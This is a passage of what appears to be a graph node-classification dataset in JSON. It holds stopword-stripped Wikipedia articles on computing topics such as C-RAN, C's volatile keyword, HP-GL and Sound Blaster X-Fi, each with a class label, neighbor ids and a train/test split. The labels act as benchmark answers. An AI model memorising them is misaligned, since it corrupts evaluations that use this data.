      5404,
      6431,
      1315,
      8998,
      300,
      3887,
      7983,
      823,
      4408,
      1337,
      5433,
      9536,
      9537,
      11584,
      3395,
      839,
      8526,
      5457,
      4435,
      6488,
      7515,
      4956,
      5981,
      3423,
      8032,
      9055,
      9569,
      3941,
      11621,
      2409,
      877,
      4462,
      2416,
      5492,
      10613,
      9591,
      2430,
      3455,
      899,
      7044,
      9607,
      1417,
      9102,
      3473,
      10141,
      8094,
      2975,
      5024,
      5025,
      9630,
      5029,
      939,
      9646,
      8625,
      1970,
      11188,
      4023,
      440,
      7098,
      6588,
      10176,
      9665,
      3525,
      8133,
      9160,
      2508,
      6092,
      6606,
      7117,
      10708,
      2005,
      984,
      3032,
      9688,
      988,
      2525,
      8671,
      9187,
      6118,
      2538,
      1515,
      2027,
      9709,
      11244,
      9713,
      6644,
      2041,
      2558,
      8703
    ],
    "mask": "Test"
  },
  {
    "node_id": 9792,
    "label": 4,
    "text": "Sparse_binary_polynomial_hashing:sparse binary polynomial hashing sparse binary polynomial hashing sbph generalization bayesian spam filtering match mutating phrases well single words sbph way generating large number features incoming text automatically using statistics determine weights features terms predictive values spam/nonspam evaluation",
    "neighbors": [
      8747
    ],
    "mask": "Train"
  },
  {
    "node_id": 9793,
    "label": 7,
    "text": "C-RAN:c-ran c-ran cloud-ran sometimes referred centralized-ran architecture cellular networks first introduced china mobile research institute april 2010 beijing china 9 years disclosed patent applications filed u.s. companies simply speaking c-ran centralized cloud computing-based architecture radio access networks supports 2g 3g 4g future wireless communication standards name comes four c main characteristics c-ran system clean centralized processing collaborative radio real-time cloud radio access network traditional cellular radio access networks ran consist many stand-alone base stations bts bts covers small area whereas group bts provides coverage continuous area bts processes transmits signal mobile terminal forwards data payload mobile terminal core network via backhaul bts cooling back haul transportation backup battery monitoring system limited spectral resources network operators 'reuse frequency among different base stations cause interference neighbouring cells several limitations traditional cellular architecture first bts costly build operate moore law helps reduce size power electrical system supporting facilities bts improved quite well second bts added system improve capacity interference among bts severe bts closer using frequency third users mobile traffic bts fluctuates called 'tide effect result average utilization rate individual bts pretty low however processing resources shared bts therefore bts designed handle maximum traffic average traffic resulting waste processing resources power idle times 1g 2g cellular networks base stations all-in-one architecture analog digital power functions housed single cabinet large refrigerator usually base station cabinet placed dedicated room along necessary supporting facilitates power backup battery air conditioning environment surveillance backhaul transmission equipment rf signal generated base station rf unit propagates pairs rf cables antennas top base station tower mounting points all-in-one architecture mostly found macro cell deployments 3g distributed base station architecture introduced ericsson nokia huawei leading telecom equipment vendors architecture radio function unit also known remote radio head rrh separated digital function unit baseband unit bbu fiber digital baseband signals carried fiber using open base station architecture initiative obsai common public radio interface cpri standard rrh installed top tower close antenna reducing loss compared traditional base station rf signal travel long cable base station cabinet antenna top tower fiber link rrh bbu also allows flexibility network planning deployment placed hundreds meters kilometres away modern base stations use decoupled architecture c-ran may viewed architectural evolution distributed base station system takes advantage many technological advances wireless optical communications systems example uses latest cpri standard low cost coarse dense wavelength division multiplexing cwdm/ dwdm technology mmwave allow transmission baseband signal long distance thus achieving large scale centralised base station deployment applies recent data centre network technology allow low cost high reliability low latency high bandwidth interconnect network bbu pool utilises open platforms real-time virtualisation technology rooted cloud computing achieve dynamic shared resource allocation support multi-vendor multi-technology environments c-ran architecture following characteristics distinct cellular architectures kt telecom operator republic korea introduced cloud computing center ccc system 3g wcdma/hspa 4g lte/lte-a network 2011 2012 concept ccc basically c-ran sk telecom also deployed smart cloud access network scan advanced-scan 4g lte/lte-a network korea later 2012 2014 airvana commscope introduced onecell c-ran-based small cell system designed enterprises public spaces one major alternative solution addressing similar challenges ran small size all-in-one outdoor bts thanks achievements semiconductor industry functionality bts including rf baseband processing mac processing package level processing implemented volume 50 litres makes system small weatherproof reduces difficulty bts site choice construction eliminates air conditioning requirement thus reduces operational costs however bts still working readily make use collaboration algorithms reduce interference neighboring btss also relatively hard upgrade repair all-in-one bts units usually mounted near antenna processing units less-protected environments also implies higher failure rate compared c-ran rru deployed outdoors advantage cloud ran lies ability implement lte-advanced features coordinated multipoint comp low latency multiple radio heads however economic benefit improvements comp negated higher backhaul costs operators main competition small cell c-ran occurs two deployment scenarios outdoor hotspot coverage indoor coverage one promising evolution paths future cellular network architecture c-ran attracted high academic research interest meanwhile native support cooperative radio capability built c-ran architecture also enables many advanced algorithms hard implement cellular networks including cooperative multi-point transmission/receiving network coding etc october 2011 wireless world research forum 27 hosted germany china mobile invited give c-ran presentation august 2012 ieee c-ran 2012 workshop hosted kunming china crc press published book green communications theoretical fundamentals algorithms applications 11th chapter c-ran green ran framework december 2012 ieee globalcom 2012 conference international workshop cloud based-stations large-scale cooperative communications hosted california usa european committee frame project 7 sponsors currently addressing many problems related cellular network architecture evolution many projects taken c-ran one future cellular network architectures like mobile cloud network project",
    "neighbors": [
      2273,
      5321,
      10303
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9794,
    "label": 9,
    "text": "Volatile_(computer_programming):volatile computer programming computer programming particularly c c++ c java programming languages volatile keyword indicates value may change different accesses even appear modified keyword prevents optimizing compiler optimizing away subsequent reads writes thus incorrectly reusing stale value omitting writes volatile values primarily arise hardware access memory-mapped i/o reading writing memory used communicate peripheral devices threading different thread may modified value despite common keyword behavior codice_1 differs significantly programming languages easily misunderstood c c++ type qualifier like codice_2 property type furthermore c c++ work threading scenarios use discouraged java c property variable indicates object variable bound may mutate specifically intended threading programming language separate keyword codice_3 threading usage codice_1 keyword exists c consequently c++ codice_1 keyword intended operations codice_1 variables atomic establish proper happens-before relationship threading specified relevant standards c c++ posix win32 volatile variables threadsafe vast majority current implementations thus usage codice_1 keyword portable synchronization mechanism discouraged many c/c++ groups example code sets value stored codice_11 codice_12 starts poll value repeatedly changes codice_13 static int foo void bar void optimizing compiler notice code possibly change value stored codice_11 assume remain equal codice_12 times compiler therefore replace function body infinite loop similar void bar_optimized void however codice_11 might represent location changed elements computer system time hardware register device connected cpu code would never detect change without codice_1 keyword compiler assumes current program part system could change value far common situation prevent compiler optimizing code codice_1 keyword used static volatile int foo void bar void modification loop condition optimized away system detect change occurs generally memory barrier operations available platforms exposed c++11 preferred instead volatile allow compiler perform better optimization importantly guarantee correct behaviour multi-threaded scenarios neither c specification c11 c++ specification c++11 specifies multi-threaded memory model volatile may behave deterministically across oses/compilers/cpus following c programs accompanying assemblies demonstrate codice_1 keyword affects compiler output compiler case gcc observing assembly code clearly visible code generated codice_1 objects verbose making longer nature codice_1 objects fulfilled codice_1 keyword prevents compiler performing optimization code involving volatile objects thus ensuring volatile variable assignment read corresponding memory access without codice_1 keyword compiler knows variable need reread memory use writes memory location thread process according c++11 iso standard volatile keyword meant use hardware access use inter-thread communication inter-thread communication standard library provides codice_24 templates java programming language also codice_1 keyword used somewhat different purpose applied field java qualifier codice_1 provides following guarantees using codice_1 may faster lock work situations range situations volatile effective expanded java 5 particular double-checked locking works correctly c codice_1 ensures code accessing field subject thread-unsafe optimizations may performed compiler clr hardware following types marked volatile reference types single boolean byte sbyte int16 uint16 int32 uint32 char enumerated types underlying type byte sbyte int16 uint16 int32 uint32 excludes value structs well primitive types double int64 uint64 decimal basically codice_1 shorthand calling codice_30 codice_31 methods special effect methods disable optimizations usually performed c compiler jit compiler cpu methods work follows codice_35 part fortran 2003 standard although earlier version supported extension making variables codice_1 function also useful finding aliasing related bugs integer volatile defined volatile following two lines code identical write i**2 loads variable memory multiplies value times write i*i loads variable twice memory multiplies values always drilling memory volatile fortran compiler precluded reordering reads writes volatiles makes visible threads actions done thread vice versa use volatile reduces even prevent optimization",
    "neighbors": [
      2529,
      10145,
      5029,
      8262,
      5911,
      5165,
      5677,
      655,
      2226,
      3767,
      3960,
      3321,
      380,
      2045,
      2620
    ],
    "mask": "None"
  },
  {
    "node_id": 9795,
    "label": 9,
    "text": "HP-GL:hp-gl hp-gl short hewlett-packard graphics language often written hpgl printer control language created hewlett-packard hp hp-gl primary printer control language used hp plotters introduced plotter hp-8972 1977 became standard almost plotters hewlett-packard printers also usually support hp-gl/2 addition pcl language formed series two letter codes mnemonics followed optional parameters instance arc drawn page sending string codice_1 means arc absolute parameters place center arc absolute coordinates 100,100 page starting angle 50 degrees measured counter-clockwise fourth optional parameter used specifies far arc continues defaults 5 degrees first introduced hp-gl contained following commands formats typical hp-gl files start setup commands followed long string graphics commands file ascii text file format instance coordinate system based smallest units one hp plotters could support set 25 µm i.e 40 units per millimeter 1016 per inch coordinate space positive negative floating point numbers specifically ±2 original hp-gl language support definition line width parameter determined pens loaded plotter advent first inkjet plotters line width pens specified within hp-gl files set printer would know line width print pen cumbersome error-prone process hewlett-packard graphics language/2 aka hp-gl/2 definition line width introduced language allowed elimination step also among improvements binary file format defined allowed smaller files shorter file transfer times minimal resolution reduced.. hp-gl related agl graphics language extension basic programming language agl implemented hewlett-packard minicomputers simplify controlling plotter agl commands describe desired graphics plotting function computer relays several hp-gl instructions plotter",
    "neighbors": [
      6594,
      8765,
      11074,
      5384,
      7849,
      6830,
      8628,
      4121,
      8763,
      8733
    ],
    "mask": "Test"
  },
  {
    "node_id": 9796,
    "label": 0,
    "text": "Semantic_parsing:semantic parsing semantic parsing task converting natural language utterance logical form machine-understandable representation meaning semantic parsing thus understood extracting precise meaning utterance applications semantic parsing include machine translation question answering code generation phrase first used 1970 yorick wilks basis machine translation programs working semantic representations shallow semantic parsing concerned identifying entities utterance labelling roles play shallow semantic parsing sometimes known slot-filling frame semantic parsing since theoretical basis comes frame semantics wherein word evokes frame related concepts roles slot-filling systems widely used virtual assistants conjunction intent classifiers seen mechanisms identifying frame evoked utterance popular architectures slot-filling largely variants encoder-decoder model wherein two recurrent neural networks rnns trained jointly encode utterance vector decode vector sequence slot labels type model used amazon alexa spoken language understanding system deep semantic parsing also known compositional semantic parsing concerned producing precise meaning representations utterances contain significant compositionality shallow semantic parsers parse utterances like show flights boston dallas classifying intent list flights filling slots source destination boston dallas respectively however shallow semantic parsing parse arbitrary compositional utterances like show flights boston anywhere flights juneau deep semantic parsing attempts parse utterances typically converting formal meaning representation language early semantic parsers used highly domain-specific meaning representation languages later systems using extensible languages like prolog lambda calculus lambda dependency-based compositional semantics λ-dcs sql python java alexa meaning representation language abstract meaning representation amr work used exotic meaning representations like query graphs semantic graphs vector representations modern deep semantic parsing models either based defining formal grammar chart parser utilizing rnns directly translate natural language meaning representation language examples systems built formal grammars cornell semantic parsing framework stanford university semantic parsing execution sempre word alignment-based semantic parser wasp datasets used training statistical semantic parsing models divided two main classes based application used question answering via knowledge base queries used code generation standard dataset question answering via semantic parsing air travel information system atis dataset contains questions commands upcoming flights well corresponding sql another benchmark dataset geoquery dataset contains questions geography u.s. paired corresponding prolog overnight dataset used test well semantic parsers adapt across multiple domains contains natural language queries 8 different domains paired corresponding λ-dcs expressions popular datasets code generation include two trading card datasets link text appears cards code precisely represents cards one constructed linking card texts java snippets linking hearthstone card texts python snippets ifttt dataset uses specialized domain-specific language short conditional commands django dataset pairs python snippets english japanese pseudocode describing robocup dataset pairs english rules representations domain-specific language understood virtual soccer-playing robots",
    "neighbors": [
      3617,
      6274,
      3748,
      8421,
      1737,
      8554,
      5677,
      10413,
      2831,
      10577,
      11538,
      10517,
      5399,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 9797,
    "label": 7,
    "text": "Distributed_manufacturing:distributed manufacturing distributed manufacturing also known distributed production cloud producing local manufacturing form decentralized manufacturing practiced enterprises using network geographically dispersed manufacturing facilities coordinated using information technology also refer local manufacture via historic cottage industry model manufacturing takes place homes consumers within maker movement diy culture small scale production consumers often using peer peer resources referred distributed manufacturing consumers download digital designs open design repository website like youmagine thingiverse produce product low costs distributed network 3d printing services 3d hubs home open-source 3-d printer reprap primary attribute distributed manufacturing ability create value geographically dispersed locations via manufacturing example shipping costs could minimized products built geographically close intended markets also products manufactured number small facilities distributed wide area customized details adapted individual regional tastes manufacturing components different physical locations managing supply chain bring together final assembly product also considered form distributed manufacturing digital networks combined additive manufacturing allow companies decentralized geographically independent distributed production cloud manufacturing call attention conjunction commons-based peer production distributed manufacturing techniques self-reinforced fantasy system eternal growth overcome development economies scope civil society play important role contributing raising whole productive structure higher plateau sustainable customised productivity true many issues problems threats rise due large democratization means production especially regarding physical ones instance recyclability advanced nanomaterials still questioned weapons manufacturing could become easier mention implications counterfeiting intellectual property might maintained contrast industrial paradigm whose competitive dynamics economies scale commons-based peer production distributed manufacturing could develop economies scope advantages scale rest cheap global transportation economies scope share infrastructure costs intangible tangible productive resources taking advantage capabilities fabrication tools following neil gershenfeld “ least developed parts world need advanced technologies ” commons-based peer production distributed manufacturing may offer necessary tools thinking globally act locally response certain problems needs well supporting individual personal manufacturing social economic benefits expected result development local production economies particular humanitarian development sector becoming increasingly interested distributed manufacturing overcome supply chain challenges last mile distribution",
    "neighbors": [
      1048,
      11117
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9798,
    "label": 0,
    "text": "Julius_(software):julius software julius speech recognition engine specifically high-performance two-pass large vocabulary continuous speech recognition lvcsr decoder software speech-related researchers developers perform almost real-time computing rtc decoding current personal computers pcs 60k word dictation task using word trigram 3-gram context-dependent hidden markov model hmm major search methods fully incorporated also modularized carefully independent model structures various hmm types supported shared-state triphones tied-mixture models number mixtures states phones standard formats adopted cope free modeling toolkit main platform linux unix workstations works windows julius free open-source software released revised bsd style software license julius developed part free software toolkit japanese lvcsr research since 1997 work continued continuous speech recognition consortium csrc japan 2000 2003 rev.3.4 grammar-based recognition parser named julian integrated julius julian modified version julius uses hand-designed type finite-state machine fsm termed deterministic finite automaton dfa grammar language model used build kind voice command system small vocabulary various spoken dialog system tasks run julius recognizer needs language model acoustic model language julius adopts acoustic models hidden markov model toolkit htk ascii format pronunciation dictionary htk-like format word 3-gram language models arpa standard format forward 2-gram reverse 3-gram trained speech corpus reversed word order although julius distributed japanese models voxforge project working create english acoustic models use julius speech recognition engine recently april 2018 thanks effort mozilla foundation 350 hours spoken english audio corpus made available new english envr-v5.4 open source speech model released alongside polish plpl-v7.1 models available sourceforge",
    "neighbors": [
      1890,
      5380,
      9320,
      9898,
      5356,
      6797,
      6223,
      7983,
      5492,
      823,
      6362,
      10557,
      2045,
      3998,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 9799,
    "label": 3,
    "text": "Sound_Blaster_X-Fi:sound blaster x-fi sound blaster x-fi lineup sound cards creative technology sound blaster series series launched august 2005 lineup pci sound cards served introduction x-fi audio processing chip models ranging xtrememusic lower end platinum fatal1ty fps elite pro top range top-end elite pro model aimed musicians bundled x-fi external i/o box offering phono preamp inputs turntables high-impedance input guitars inch mic input headphone output line-in full size midi i/o well optical rca coaxial digital inputs outputs remote control platinum fatal1ty fps models offer front-panel drive-bay control unit remote control base model supplied without accessories top model claimed 109 db signal-to-noise ratio elite pro model uses higher-end dac 116 db claimed bottom two models feature 2 mb onboard x-ram top models offer 64 mb x-ram designed use games store sound samples improved gaming performance launch reviews support creative claims higher performance however even top-end 64 mb equipped model falling slightly behind older audigy cards october 2006 saw minor rebranding x-fi xtrememusic edition fact highly capable gaming card offers hardware decoding eax support replaced xtremegamer model revised model featured half-width pcb non-gold-plated connectors optical instead digital digital i/o module jack lacked connector users wishing purchase separate x-fi i/o box functionality otherwise market segment occupied xtrememusic moved downwards introduction cheaper 'xtreme audio 'xtreme audio notebook products despite x-fi label products x-fi line using emu20k1 chip ca20k1 older chip similar audigy se sb live cards ca0106-wbtlf thus lacking hardware acceleration 3d sound eax sound effects gaming content creation features i/o extensibility x-fi models new product introduced x-fi 'xtremegamer fatal1ty pro identical function fatal1ty fps made affordable unbundling i/o panel remote control 2007 creative technology unveiled pci express x1 expresscard/34 versions sound blaster x-fi xtreme audio consumer electronics show creative yet release pcie versions emu-based x-fi cards adapting ca20k1 chip pcie proved troublesome company reporting design difficulties latency problems delays 2008 x-fi titanium series announced using revised ca20k2 chip featured integraded risc processor safeguarding pcie-induced latencies ddr sdram interface place sdram integrated high definition audio architecture uaa component products included fatal1ty cards 64 mb x-ram optional i/o drive bay regular titanium 16 mb x-ram 109 db snr spec former unlike pci cards cards use software-based dolby digital live 5.1 encoding 2010 titanium hd added lineup featuring new dac 122 db snr rca audio outputs dropping support windows xp addition pci pcie internal sound cards creative also released external usb-based solution named x-mod november 2006 x-mod listed category rest x-fi lineup stereo device marketed improve music playing laptop computers lower specifications internal offerings external products use x-fi name include usb-based sound blaster x-fi hd sound blaster x-fi surround 5.1 pro sound blaster x-fi go pro internal hardware components different various usages needs gaming surround audiophile standards audio processor x-fi powerful time release offering extremely robust sample rate conversion src engine addition enhanced internal sound channel routing options greater 3d audio enhancement capabilities significant portion audio processing unit devoted resampling engine src engine far capable previous creative sound card offerings limitation major thorn creative side digital audio sampled 44.1 khz standard doubt related cd-da sound cards often designed process audio 48 khz 44.1 khz audio must resampled 48 khz creative previous cards dsps operated 48 khz audio dsp able process affect poor resampling implementation introduces artifacts audio heard measured higher intermodulation distortion within higher frequencies generally 16 khz x-fi resampling engine produces near-lossless-quality result far exceeding known audio card dsp available time release functionality used simple audio playback several features card technology claims improve clarity digital music digital analysis supported x-fi models including xtreme audio x-mod sound blaster x-fi presents following features usually implemented aid x-fi dsp software xtreme audio model since release x-fi caused several unsolved problems sound glitches various motherboards creative labs states primary function restore portions sound lost compression compression meant digital file-size reduction achieved digital audio data compression technologies like example mp3 rather idea reverse effects dynamic range compression analog technique used production 1990s newer audio cds exception classical music recordings make sound louder volume level setting found subjectively louder cds get airplay sell better achieve loudness without introducing strong distortion points signal volume reaches maximum compressed means case reduced volume whole signal multiplied factor maximum volume reached music whole louder maximum volume points mostly transients pronounced since whole process done final audio cd recorded effect equally present uncompressed audio files created cd lossless compressed audio made cd well lossy compressed audio cd transients typically found percussive sounds plosive consonants voice recordings first milliseconds so-called attack phase non-percussive instrument sounds tend somewhat muffled dynamic range compression undo effect uses multiband compander compressor/expander dynamically adjusted compression/expansion main function detect transients increase relative volume level consequence enabling signal altered whether result improves upon input audio purely matter perception depend type audio played cmss-3d recreates realistic surround sound audio source puts right center action whether using multichannel speakers headphones cmss-3d dsp feature provides audio enhancement requires creative proprietary drivers supported linux os depending equipment used cmss-3d 3 variants enabling setting apply special filtering algorithms order improve localization sound sources located close listener enabling setting apply special filtering algorithms order improve localization sound sources located listener environmental audio extensions designed enabled game developers within game enhance simulated-reality user experiencing example ringing game-world swords sound differently depending whether protagonist currently game-world temple vault game-world open field also 8 built-in eax effects enabled user smart volume management compressor evens dynamic range given source quieter sounds louder loud sounds quiet best used circumstances noise disturbance might issue late night instance otherwise generally preferable disabled render sound less dynamic instance lessening impact loud parts movies also making music sound less lively function divides music ten frequency bands adjusted using sliders multiple volume adjustments different inputs outputs system master volume affects settings default recommended value 50 sources actually equates 0 db amplification none 100 value causes 16 db amplification many creative previous sound cards x-fi supports soundfonts additionally audio creation mode card allows use eax midi playback via use controllers setting controls dd sound encoder setting dolby digital bitstream dts sound instead although creative slow embrace 64-bit drivers x-fi lineup x86-64 architecture based operating systems supported microsoft windows 7 includes basic driver support many x-fi series cards many x-fi features however require software applications provided creative order utilize full capabilities hardware september 24 2007 creative labs released closed source unsupported beta driver providing linux 64-bit os support following sound blaster x-fi series sound cards open-source driver available oss v4 build 1013 datasheets provided creative enable alsa driver development november 6 2008 creative finally released driver gpl license supports x86 well x86-64 architectures listed support area may 15 2009 communications creative suse developer takashi iwai finally got mergeable version x-fi driver august 31 2009 driver snd-ctxfi included release alsa 1.0.21 support creative sound blaster x-fi titanium hd added january 25 2012 alsa v1.0.25 release driver support i/o front panel ir documentation part missing xtreme audio different chipset stayed unsupported longer time currently supported advanced linux alsa driver modules might require installation additional packages alternative repositories x-fi mb pure software solution windows system requirement thus provide linux support entry-level model x-fi series sound blaster x-fi xtreme audio actually emu20k1 chip re-branded audigy se using family chips ca0106-wbtlf even drivers thus x-fi–related processing performed software also lacks basic hardware acceleration like sb live 24-bit audigy se budget soundblaster models x-fi xtreme audio use drivers rest x-fi family lacks asio games recognize x-fi capable hardware device hardware profile resembles older live audigy cards x-fi mb software solution enables basic x-fi features computers integrated audio x-fi device requires degree driver support audio hardware manufacturer x-fi mb commonly bundled motherboards computer systems comparable x-fi xtremeaudio bundled asus asrock motherboards x-fi mb sold x-fi supreme fx actually standard analog devices integrated hd audio codec paired x-fi mb x-fi features implemented entirely software hardware vendors sell x-fi mb solution simply sound blaster x-fi integrated sound x-fi mb available different versions e.g x-fi mb x-fi mb2 x-fi mb3 x-fi mb5 current version available select laptops desktops x-fi mb5 non-oem version x-fi mb3 sold creative labs works compatible motherboard sound chips realtek x-fi mb3 provides effective software version full x-fi card also provided version alchemy works non-creative sound cards restore legacy eax effects",
    "neighbors": [
      2368,
      6971,
      10369,
      10371,
      10363,
      7820,
      2221,
      3791,
      2383,
      593,
      6415,
      8561,
      8625,
      10359,
      10360,
      4699
    ],
    "mask": "Test"
  },
  {
    "node_id": 9800,
    "label": 4,
    "text": "GingerMaster:gingermaster gingermaster malware affects android operating system version 2.3 first detected august 2011 gingermaster android malware contains root exploit packaged within infected app application launched android device acquires root privileges device accesses sensitive data gingermaster steals data",
    "neighbors": [
      11266,
      10756,
      901,
      7739,
      2538,
      2259,
      2041,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 9801,
    "label": 7,
    "text": "Cloud-based_quantum_computing:cloud-based quantum computing cloud-based quantum computing invocation quantum emulators simulators processors cloud increasingly cloud services looked method providing access quantum processing quantum computers achieve massive computing power initiating quantum physics processing power users allowed access quantum-powered computers internet known quantum computing within cloud ibm connected small quantum computer cloud allows simple programs built executed cloud many people academic researchers professors schoolkids already built programs run many different quantum algorithms using program tools consumers hoped use fast computing model financial markets build advanced ai systems use methods allow people outside professional lab institution experience learn phenomena technology cloud-based quantum computing used several contexts",
    "neighbors": [
      10116,
      1480,
      11209,
      74,
      8554,
      3573,
      2680,
      3323,
      2781
    ],
    "mask": "None"
  },
  {
    "node_id": 9802,
    "label": 4,
    "text": "Backup_(software):backup software backup backup utility made apple mac os x available apple mobileme formerly .mac collection internet services backup used connection either user online mobileme idisk macintosh cd-rw dvd-r drive make safe archival copies critical files folders release icloud backup longer available release macos sierra longer works initial versions backup regarded feature-sparse frequently unstable however november 5 2003 apple released backup 2.0 added new features offered greater reliability predecessors backup 2 allowed creation archive copies important data overall basic feature set backup software apple introduced backup 3 paris expo september 20 2005 along upgrades .mac version offered backup settings ability back mail databases 2006 worldwide developers conference apple announced development time machine new backup application included mac os x v10.5 leopard time machine complete backup solution thus ability completely replace backup general backup solution mac users mobileme released july 11 2008 .mac discontinued backup continued available mobileme users software re-branded mobileme backup version 3.2 release",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      7318,
      4888,
      5784,
      3228,
      11037,
      2207,
      1439,
      3366,
      811,
      3371,
      5292,
      1710,
      6700,
      7983,
      8877,
      1074,
      10036,
      3766,
      2232,
      9912,
      11257,
      9406,
      6849,
      9025,
      4933,
      713,
      9418,
      9035,
      1358,
      3790,
      7118,
      5713,
      3670,
      9430,
      4184,
      3035,
      4571,
      2141,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      6771,
      2676,
      7928,
      8441,
      7163,
      7422
    ],
    "mask": "Test"
  },
  {
    "node_id": 9803,
    "label": 2,
    "text": "WiperSoft:wipersoft wipersoft anti-spyware program developed wiper software designed help users protect computers threats adware browser hijackers worms potentially unwanted programs pups currently available microsoft windows wipersoft launched 2015 available free program home users users able use scan removal functions without buy subscription 2016 re-released new modern design improved detection removal functionalities user-friendly interface year wipersoft also became paid program wipersoft saw big increase downloads sales 2017 reportedly used 1 million users 120 different countries tested softpedia 2017 rated 100 clean wipersoft primarily anti-spyware program comes two versions free wipersoft offers users scan computers spyware paid wipersoft features include spyware detection removal help desk services custom fix according wiper software program detect remove threats like potentially unwanted programs adware browser hijackers questionable toolbars browser add-ons detected potential threats automatically deleted users option keeping installed program also undo changes made detected threats change homepage default search engine program currently available microsoft windows users popular browsers google chrome mozilla firefox internet explorer opera supported program also available 10 languages",
    "neighbors": [
      8584,
      9771,
      877,
      6797,
      7983,
      5935,
      10392,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 9804,
    "label": 9,
    "text": "ALGOL_58:algol 58 algol 58 originally known ial one family algol computer programming languages early compromise design soon superseded algol 60 according john backus zurich acm-gamm conference two principal motives proposing ial provide means communicating numerical methods procedures people b provide means realizing stated process variety machines ... algol 58 introduced fundamental notion compound statement restricted control flow tied identifier scope way algol 60 blocks bauer attributes name bottenbruch coined term algorithmic language algorithmische sprache 1957 least germany proposals universal language association computing machinery acm also german gesellschaft für angewandte mathematik und mechanik society applied mathematics mechanics gamm decided organize joint meeting combine meeting took place may 27 june 2 1958 eth zurich attended following people language originally proposed called ial international algebraic language according perlis rejected 'unspeakable pompous acronym algol suggested instead though officially adopted year later publication following meeting still used name ial end 1958 zmmd-group built working algol 58 compiler z22 computer zmmd abbreviation zürich rutishauser worked münchen workplace bauer samelson mainz location z22 computer darmstadt workplace bottenbruch algol 58 saw implementation effort ibm effort competition fortran soon abandoned also implemented dartmouth college lgp-30 implementation soon evolved algol 60 implementation burroughs 220 called balgol evolved along lines well retained much algol 58 original character algol 58 primary contribution later languages used basis jovial mad neliac algo also used 1959 publish algorithms cacm beginning trend using algol notation publication continued many years",
    "neighbors": [
      512,
      9345,
      5496,
      1931,
      4492,
      6414,
      10510,
      5521,
      6036,
      3736,
      10400,
      1702,
      428,
      5806,
      9008,
      3765,
      7479,
      1976,
      5946,
      9019,
      7612,
      10043,
      10684,
      10047,
      10560,
      963,
      8262,
      1864,
      3529,
      1610,
      5961,
      11212,
      8397,
      5585,
      11219,
      5588,
      7894,
      1016,
      4057,
      1883,
      10586,
      11099,
      10720,
      4069,
      10089,
      8813,
      2798,
      1392,
      6640,
      9330,
      10098,
      3960,
      3577,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 9805,
    "label": 7,
    "text": "Digital_transaction_management:digital transaction management digital transaction management dtm category cloud services designed digitally manage document-based transactions dtm removes friction inherent transactions involve people documents data create faster easier convenient secure processes dtm goes beyond content document management include e-signatures authentication non-repudiation enabling co-browsing customer business document transfer certification secure archiving goes beyond records management variety meta-processes around managing electronic transactions documents associated dtm standards proposed managed xdtm standard association aragon research estimated ye 2016 70 large enterprises dtm initiative underway fully implemented",
    "neighbors": [
      4194
    ],
    "mask": "Train"
  },
  {
    "node_id": 9806,
    "label": 2,
    "text": "Software_appliance:software appliance software appliance software application combined enough operating system jeos run optimally industry-standard hardware typically server virtual machine software distribution firmware implements computer appliance virtual appliances subset software appliances main distinction packaging format specificity target platform virtual appliance virtual machine image designed run specific virtualization platform software appliance often packaged generally applicable image format e.g. live cd supports installations physical machines multiple types virtual machines installing software appliance virtual machine packaging image creates virtual appliance software appliances several benefits traditional software applications installed top operating system software appliance packaged virtual machine format virtual appliance allowing run within virtual machine container virtual appliance could built using either standard virtual machine format open virtualization format ovf format specific particular virtual machine container example vmware virtualbox amazon ec2 software appliance packaged live cd image allowing run real hardware addition types virtual machines allows developers avoid complexities involved supporting multiple incompatible virtual machine image formats focus lowest common denominator instead i.e. iso images supported virtual machine platforms commercial software appliances typically sold subscription service pay-as-you-go alternative approach software service customers receive service maintenance application vendor eliminating requirement manage multiple maintenance streams licenses service contracts cases application vendor may install software appliance piece hardware prior delivery customer thereby creating computer appliance cases primary value customer remains simplicity purchase deployment maintenance",
    "neighbors": [
      9377,
      8998,
      7656,
      6058,
      3885,
      7983,
      4432,
      2417,
      11410,
      467,
      9562,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 9807,
    "label": 2,
    "text": "Billix:billix billix live usb live cd supports multiple linux distributions including several special purpose distributions billix designed toolkit unix linux system administrators configured supports several distributions also following programs included",
    "neighbors": [
      6371,
      6436,
      5363,
      5397,
      823,
      7483,
      4637,
      1150,
      831
    ],
    "mask": "Test"
  },
  {
    "node_id": 9808,
    "label": 9,
    "text": "Active_Scripting:active scripting active scripting formerly known activex scripting technology used windows implement component-based scripting support based ole automation part com allows installation additional scripting engines form com modules active scripting technologies first released 1996 release microsoft internet explorer 3.0 august 1996 internet information services 3.0 products december 1996 usual applications active scripting include active server pages asp server scripts internet explorer windows script host wsh scripts automating routine tasks including use login scripts registry manipulation like administrative uses include windows management instrumentation active directory service interfaces active scripting also used general-purpose scripting database programming text-processing rapid prototyping application macro/scripting programming applications use active scripting main automation method others macro facility components available use via api one may opt add language and/or tool available default like programming microsoft excel perl rexx rather visual basic applications vba transferring data terminal emulator word processor way spreadsheet dissimilar macro tools none many uses active scripting addition windows similar functionality unix shell scripts well incremental improvement upon batch files command.com windows nt style shell scripts cmd.exe way vbscript replacement qbasic last available supplementary disc windows 95 majority languages used active scripting mentioned glue languages perl commonly used third-party script engine interfaces active scripting engines public developer create applications programmable active scripting languages well engines additional languages active scripting engines available several languages popular include windows cscript.exe command line wscript.exe running gui main means implementation installed active script languages clicking icon running command line script run dialogue etc default run plain text file containing code windows script file .wsf xml file contain one script one language addition elements executed windows script host third-party shell take command version 10 configured direct interoperability script host installed engines wsh engine based take command language reportedly development software securecrt use wsh functionality allow automation means installed scripting engine script host related components engines able integrated called windows applications like component active scripting regarded complete longer active development microsoft however technology still supported microsoft sustaining engineering team responsible bug fixes security enhancements furthermore scripting engines continue shipped future releases microsoft windows iis originally .net framework scripting technology separate scripting ide called visual studio applications vsa interfaces technology also available via active scripting allowing even .net-unaware applications scripted using .net languages vsa also meant replace visual basic applications however entire technology deprecated version 2.0 .net framework leaving clear upgrade path applications desiring active scripting support although scripts created c vbscript visual basic .net .net languages compiled executed run-time 